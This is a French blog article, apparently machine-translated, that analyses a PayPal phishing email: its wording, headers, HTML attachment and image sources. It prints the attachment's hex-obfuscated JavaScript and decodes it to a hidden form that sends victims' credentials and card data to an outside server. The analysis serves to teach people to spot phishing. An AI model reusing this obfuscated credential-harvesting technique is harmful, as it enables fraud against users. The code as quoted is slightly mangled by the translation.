10Sep

Sécurité en ligne: Briser l'anatomie d'un courriel d'hameçonnage


Dans le monde actuel où l'information de tout le monde est en ligne, le phishing est l'une des attaques en ligne les plus populaires et dévastatrices, car vous pouvez toujours nettoyer un virus, mais si vos coordonnées bancaires sont volées, vous êtes en difficulté.Voici une ventilation d'une telle attaque que nous avons reçue.

Ne pensez pas que vos détails bancaires sont importants: après tout, si quelqu'un contrôle votre compte, il connait non seulement les informations contenues dans ce compte, mais il y a de fortes chances que les mêmes informations de connexion puissent être utilisées sur différents comptes.autres comptes. Et s'ils compromettent votre compte de messagerie, ils peuvent réinitialiser tous vos autres mots de passe.

Donc, en plus de garder des mots de passe forts et variés, vous devez toujours être à l'affût des courriels faux masquerading comme la vraie chose. Alors que la plupart des tentatives d'hameçonnage sont amateurs, certains sont assez convaincants, il est donc important de comprendre comment les reconnaître au niveau de la surface et comment ils fonctionnent sous le capot.

Image par asirap

Examiner ce qui est en vue simple

Notre exemple de courrier électronique, comme la plupart des tentatives d'hameçonnage, vous "notifie" de l'activité sur votre compte PayPal qui, dans des circonstances normales, serait alarmante. L'appel à l'action consiste donc à vérifier / restaurer votre compte en soumettant à peu près tous les renseignements personnels auxquels vous pouvez penser. Encore une fois, c'est assez stéréotypé.

Bien qu'il y ait certainement des exceptions, à peu près tous les courriels d'hameçonnage et d'hameçonnage sont chargés avec des drapeaux rouges directement dans le message eux-mêmes. Même si le texte est convaincant, vous pouvez généralement trouver de nombreuses erreurs dans le corps du message qui indiquent que le message n'est pas légitime.

Le corps du message

À première vue, c'est l'un des meilleurs e-mails d'hameçonnage que j'ai pu voir. Il n'y a aucune faute d'orthographe ou de grammaire et le verbiage se lit selon ce que vous pourriez attendre. Cependant, il y a quelques indicateurs rouges que vous pouvez voir lorsque vous examinez le contenu de plus près.

  • "Paypal" - Le cas correct est "PayPal"( capital P).Vous pouvez voir les deux variantes sont utilisées dans le message. Les entreprises sont très délibérées avec leur image de marque, il est donc douteux que quelque chose comme cela passerait le processus d'épreuvage.
  • "autoriser ActiveX" - Combien de fois avez-vous vu une entreprise basée sur le Web de la taille de Paypal utiliser un composant propriétaire qui ne fonctionne que sur un seul navigateur, surtout lorsqu'ils prennent en charge plusieurs navigateurs? Bien sûr, quelque part là-bas une entreprise le fait, mais c'est un drapeau rouge.
  • "solidement". - Notez que ce mot ne s'aligne pas dans la marge avec le reste du texte du paragraphe. Même si j'étire un peu plus la fenêtre, celle-ci ne s'emballe pas ou ne s'épelle pas correctement.
  • "Paypal!" - L'espace avant le point d'exclamation semble gênant. Juste une autre bizarrerie qui, je suis sûr, ne serait pas dans un courriel légitime.
  • "PayPal- Formulaire de mise à jour du compte.pdf.htm" - Pourquoi PayPal ajouterait-il un "PDF" en particulier quand il pourrait simplement créer un lien vers une page de son site? De plus, pourquoi essaieraient-ils de déguiser un fichier HTML en format PDF?C'est le plus gros drapeau rouge de tous.

L'en-tête du message

Lorsque vous jetez un œil à l'en-tête du message, deux autres indicateurs rouges apparaissent:

  • L'adresse de départ est [email protected].
  • L'adresse à est manquante. Je n'ai pas laissé tomber ceci, il ne fait tout simplement pas partie de l'en-tête de message standard. Typiquement, une entreprise qui a votre nom vous personnalisera l'email.

La pièce jointe

Lorsque j'ouvre la pièce jointe, vous pouvez voir immédiatement que la mise en page n'est pas correcte car il manque des informations de style. Encore une fois, pourquoi PayPal enverrait-il un formulaire HTML par courrier électronique alors qu'il pourrait simplement vous donner un lien sur son site?

Remarque: nous avons utilisé la visionneuse de pièces jointes HTML de Gmail pour cela, mais nous vous recommandons de NE PAS OUVRIR les pièces jointes des escrocs. Jamais. Déjà.Ils contiennent très souvent des exploits qui vont installer des chevaux de Troie sur votre PC pour voler vos informations de compte.

En faisant défiler un peu plus, vous pouvez voir que ce formulaire demande non seulement nos informations de connexion PayPal, mais aussi des informations bancaires et de carte de crédit. Certaines images sont cassées.

Il est évident que cette tentative d'hameçonnage va tout faire d'un seul coup.

La panne technique

Alors qu'il devrait être assez clair sur la base de ce qui est en vue qu'il s'agit d'une tentative de phishing, nous allons maintenant décomposer la composition technique de l'e-mail et voir ce que nous pouvons trouver.

Informations provenant de la pièce jointe

La première chose à regarder est la source HTML du formulaire de pièce jointe qui soumet les données au site bidon.

Lors de la visualisation rapide de la source, tous les liens apparaissent valides car ils pointent vers "paypal.com" ou "paypalobjects.com" qui sont tous les deux légitimes.

Maintenant, nous allons jeter un oeil à quelques informations de base de pages que Firefox rassemble sur la page.

Comme vous pouvez le voir, certains des graphiques sont tirés des domaines "blessedtobe.com", "goodhealthpharmacy.com" et "pic-upload.de" au lieu des domaines PayPal légitimes.

Informations provenant des en-têtes d'e-mail

Nous allons maintenant examiner les en-têtes des e-mails bruts. Gmail le rend disponible via l'option de menu Afficher l'original du message.

En regardant les informations d'en-tête pour le message d'origine, vous pouvez voir ce message a été composé en utilisant Outlook Express 6. Je doute que PayPal a quelqu'un sur le personnel qui envoie chacun de ces messages manuellement via un client de messagerie obsolète.

Maintenant, en regardant les informations de routage, nous pouvons voir l'adresse IP de l'expéditeur et le serveur de messagerie relais.

L'adresse IP "Utilisateur" est l'expéditeur d'origine. En faisant une recherche rapide sur les informations IP, nous pouvons voir que l'adresse IP d'envoi est en Allemagne.

Et quand on regarde le mailing du serveur mailing( mail.itak.at), on peut voir qu'il s'agit d'un FAI basé en Autriche. Je doute que PayPal achemine ses emails directement via un FAI basé en Autriche quand ils ont une ferme de serveurs massive qui pourrait facilement gérer cette tâche.

Où vont les données?

Nous avons donc clairement déterminé qu'il s'agit d'un courriel d'hameçonnage et avons recueilli des informations sur l'origine du message, mais qu'en est-il de l'endroit où vos données sont envoyées?

Pour voir cela, nous devons d'abord enregistrer la pièce jointe HTM faire notre bureau et ouvrir dans un éditeur de texte. En défilant, tout semble être en ordre sauf quand nous arrivons à un bloc Javascript suspect.

Briser la source complète du dernier bloc de Javascript, nous voyons:

& lt; script language = "JavaScript" type = "texte / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x = » 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e » y = »; for( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;

Chaque fois que vous voyez une grande chaîne mêlée de lettres et de nombres apparemment aléatoires intégrés dans un bloc Javascript, c'est généralement quelque chose de suspect. En regardant le code, la variable "x" est définie sur cette grande chaîne, puis décodée dans la variable "y".Le résultat final de la variable "y" est ensuite écrit dans le document au format HTML.

Depuis la grande chaîne est faite de chiffres 0-9 et les lettres af, il est plus probable codé par un simple ASCII à la conversion Hex:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

à Translaté:

& lt; form name = » principal » id = » principal »method = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;

Ce n'est pas une coïncidence si cela décode dans une étiquette de formulaire HTML valide qui envoie les résultats non pas à PayPal, mais à un site malveillant.

En outre, lorsque vous affichez la source HTML du formulaire, vous verrez que cette balise de formulaire n'est pas visible car elle est générée dynamiquement via le Javascript. C'est une manière intelligente de cacher ce que le HTML fait réellement si quelqu'un devait simplement voir la source générée de la pièce jointe( comme nous l'avons fait précédemment) par opposition à l'ouverture de la pièce jointe directement dans un éditeur de texte.

Exécution d'un whois rapide sur le site incriminé, nous pouvons voir qu'il s'agit d'un domaine hébergé sur un hébergeur populaire, 1and1.

Ce qui ressort, c'est que le domaine utilise un nom lisible( par opposition à quelque chose comme "dfh3sjhskjhw.net") et que le domaine a été enregistré depuis 4 ans. Pour cette raison, je crois que ce domaine a été détourné et utilisé comme un pion dans cette tentative de phishing.

Le cynisme est une bonne défense

Quand il s'agit de rester en ligne en sécurité, il ne fait jamais de mal d'avoir un peu de cynisme.

Bien que je sois sûr qu'il y a plus de drapeaux rouges dans l'exemple de courriel, ce que nous avons souligné ci-dessus sont des indicateurs que nous avons vus après seulement quelques minutes d'examen. Hypothétiquement, si le niveau de surface de l'email imitait sa contrepartie légitime à 100%, l'analyse technique révélerait encore sa vraie nature. C'est pourquoi il est important de pouvoir examiner à la fois ce que vous pouvez et ne pouvez pas voir.